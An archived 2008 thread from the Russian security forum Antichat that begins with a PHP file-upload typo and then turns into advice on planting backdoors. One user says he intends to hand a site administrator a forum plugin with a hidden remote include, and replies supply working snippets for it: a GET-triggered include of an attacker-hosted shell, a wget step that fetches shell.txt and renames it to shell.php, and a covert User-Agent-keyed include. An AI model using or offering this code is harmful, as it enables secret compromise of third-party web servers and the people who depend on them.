ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.03.2008, 03:42
|
|
Постоянный
Регистрация: 29.05.2007
Сообщений: 852
Провел на форуме:
4832771
Репутация:
1916
|
|
чёт не втыкаю в чём проблема=//
PHP код:
<?php
echo '<form engtype="multipart/form-data" method="post" action="image.php">
<input type="file" name="image" /><br />
<input type="submit" name="submit" /></form> ';
if(isset($_POST['submit']))
{
if(!empty($_FILES['image']))
{
#############
}
else
{
echo 'Пусто';
}
}
выдаёт пусто....
я уже полчаса туплю не могу вьехать в чём проблема...почему файл в массив не помещается? |
|
|
30.03.2008, 04:38
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
echo '<form engtype="multipart/form-data" method="post" action="image.php">
у тебя engtype, а надо enctype
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 30.03.2008 в 04:44..
|
|
|
|
30.03.2008, 11:12
|
|
Постоянный
Регистрация: 29.05.2007
Сообщений: 852
Провел на форуме:
4832771
Репутация:
1916
|
|
Сообщение от Scipio
у тебя engtype, а надо enctype
аааа...блин...опечатался и сидел думал чё за хня.
Скип и Воланд спасибо 
пойду убью себя ап стену =/
|
|
|
|
30.03.2008, 09:27
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
вставляешь в страницу вот это
if(@$_GET["hack"] == "yes") include($_GET['file']);
а вызываешь вот так
http://site.ru/index.php?hack=yes&file=http://site.ru/shell.txt
|
|
|
|
30.03.2008, 09:43
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867
Репутация:
5
|
|
Warning: include() [function.include]: URL file-access is disabled in the server configuration
Вот такую ошибку нельзя обойти или это только в конфигах меняется?
|
|
|
|
30.03.2008, 10:06
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867
Репутация:
5
|
|
Сообщение от [x26]VOLAND
Вот теперь понятно. В настройках PHP отключена опция allow_url_include
Обойти её в большинстве случев нельзя, надо просить хостера включить (сам просил, всегда прокатывало).
это что при выключенном параметре, невозможен php-инклудинг?
З.Ы. я этот скрипт хочу не себе поставить, поэтому я должен быть готов на все случаи жизни=), шелл я подсунуть не могу уж слишком он громоздкий, спалят...
Последний раз редактировалось QZAR-X; 30.03.2008 в 10:10..
|
|
|
|
30.03.2008, 10:11
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
да невозможен и ничего ты несделаешь с удаленного сервера шел не приинклудишь а вот с того сервера котором ты находится должен смоч приинклудить попробуй с локального сервера шел приинклудить.
Попробуй залить в папку /tmp шел а потом вставь в скрипт что то типо этого
<?
include ("/tmp/shell.txt")
?>
Последний раз редактировалось heks; 30.03.2008 в 10:14..
|
|
|
|
30.03.2008, 10:17
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867
Репутация:
5
|
|
я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд. Я незнаю разрешено ли на том серваке по url инклудить, поэтому отрабатываю разные случаи.
Тогда можно ли сделать, коммандой 1.php?shell=conf.php, файл(локальный) просто прочитался или скачался?
А можно чтобы вместо инклуда, была заливка файла на сервер и вызов был примерно таков:
index.php?hack=yes&upload=shell.php
Последний раз редактировалось QZAR-X; 30.03.2008 в 10:26..
|
|
|
|
30.03.2008, 10:49
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
Сообщение от QZAR-X
я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд. Я незнаю разрешено ли на том серваке по url инклудить, поэтому отрабатываю разные случаи.
Тогда можно ли сделать, коммандой 1.php?shell=conf.php, файл(локальный) просто прочитался или скачался?
А можно чтобы вместо инклуда, была заливка файла на сервер и вызов был примерно таков:
index.php?hack=yes&upload=shell.php
встрой туда что я тебе сказал и все будет возможно использовать можно будет какой либо качалкой залить с удаленного сайта шел примерно так сам точно незнаю скрипт в котором это было где то есть но я непомню где ;(
wget http://site.ru/shell.txt;mv shell.txt shell.php но дира должна быть доступна для записи
|
|
|
|
30.03.2008, 11:53
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от QZAR-X
я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд.
Так тебе надо скрипт протроянить? вот:
$k=$_SERVER["USER_AGENT"];
это где нить незаметно так
if (strpos($k,"f35761"){ $path=explode(":",$k); include($path[1]);}
а уж юзер агент на такой: f35761:/path/to/shell.php
сменить каждый может, и шелл спрятать далеко на сервере или даже на удаленном сервере
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид